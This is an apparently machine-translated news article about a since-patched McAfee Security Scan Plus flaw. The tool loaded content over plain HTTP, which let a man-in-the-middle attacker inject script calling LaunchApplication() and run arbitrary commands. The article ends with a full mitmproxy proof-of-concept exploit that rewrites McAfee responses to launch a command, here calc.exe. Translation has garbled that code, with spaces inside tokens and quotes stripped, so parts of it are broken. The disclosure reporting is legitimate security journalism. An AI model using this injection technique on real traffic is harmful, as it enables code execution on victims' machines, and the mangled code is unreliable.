McAfee Security Scan Plus: From this site you have read many times about security companies' negligence. It's time for McAfee. The company allegedly repairs an error in the free Security Scan Plus tool that retrieves information from interested computers via HTTP, that is, in plain text.
The company seems to have forgotten what it preaches, or assumed that it is excluded that one thinks of man-in-the-middle attacks on its services, such as free online scanning, but also internal ads and the UI that displays them.
The vulnerability was discovered by SecuriTeam, which states that the McAfee tool "retrieves information from different mcafee.com domains and displays it to the user, usually in the main application window".
Since the HTTPS protocol is not used to transfer this information, the information can be modified by an attacker who can then take advantage of the library calling the tool (MCBRWSR2.DLL) to display that HTML content wish.
This library exposes the JavaScript LaunchApplication () API, which very simply means that an attacker can execute any command he wants the victim to.
The McAfee Security Scan Plus program, after each scan, displays a UI that indicates the target's "level of protection" at the following URL:
http://home.mcafee.com/SecurityScanner/SSBanner.aspx
The information is displayed on the progress screen of the online scan, so the user can easily think that his computer is clean and actually just has been violated.
If you are now in the attacker's position, and you are doing a MITM attack, it's quite easy to run commands with the privileges of the logged-in user, which in many cases is the same account as the manager.
Full PoC needs only 38 code lines. McAfee recognized the issue here and repaired the service in July.
See the PoC code
#! / usr / bin / env python3 # # HTTP proxy mode: # mitmproxy -s mcsploit_inline.py --ignore '. *' # # Transparent proxy mode: # mitmproxy -s mcsploit_inline.py -T # from mitmproxy import ctx, http import requests import time COMMAND = "c: \\\\ windows \\\\ system32 \\\\ calc.exe" CMDARGS = "" def response (flow): if flow.request.scheme == "http" and (flow.request.headers ['host']. endswith ("mcafee.com") or "mcafee" in flow.request.url): if flow.response.status_code == 302: ctx.log ("[+] [MCSPLOIT] Insecure McAfee request found! (HTML) ") https_url = flow.request.url.replace (" http: // "," https: // ") r = requests.get (https_url, headers = flow.request .headers, verify = False) if "text / html" not in r.headers ['content-type']: return contents = r.text contents = contents.replace ("", ""% (COMMAND, CMDARGS)) flow.response = http.HTTPResponse.make (200, bytes (contents, encoding =" utf-8 "), {" Content-Type ":" text / html; charset = utf-8 "," Expires ":" - 1 "}) return try: if flow.response.headers [" content-type "] ==" text / javascript ": ctx.log (" [+] [MCSPLOIT] Insecure McAfee request found! (JS) ") inject =" try {window.external.LaunchApplication (\ "% s \", \ "% s \");} catch (launchapperr) {var x;} \ n "% (COMMAND, CMDARGS) try: flow.response.contents = inject + flow.response.contents except AttributeError: ctx.log ("[-] [MCSPLOIT] No content in the original response!") Pass except KeyError: pass